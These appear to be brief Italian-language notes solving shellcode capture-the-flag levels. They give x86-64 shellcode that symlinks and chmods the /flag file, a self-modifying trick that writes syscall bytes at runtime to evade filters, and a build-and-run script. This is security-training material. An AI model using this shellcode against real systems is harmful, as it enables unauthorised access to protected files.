ln -s /flag f

Push 0x66
Push rsp
Pop rdi
Push 4
Pop rsi
Push 0x5a
Pop rax
Syscall <--- (*)

(*) Sostituire se serve:
  Mov byte ptr [rip+syscall], 0x0f
  Mov byte ptr [rip+syscall+1], 0x05
  Lea r8, [rip+syscall]
  Call r8
  Syscall: .word 0x0000
  
Aggiungere nop all'inizio se serve

------- script.sh ----------

gcc -nostdlib -o program program.s
objcopy --dump-section .text=program_binary program
/challenge/run < program_binary

---------------------------------
° LVL 12:
push 0x66
mov rdi, rsp
xor esi, esi
add esi, 4
mov al, 0x5a
syscall

°LVL 9
Guardare i byte!
saltare le int3 con dei jump
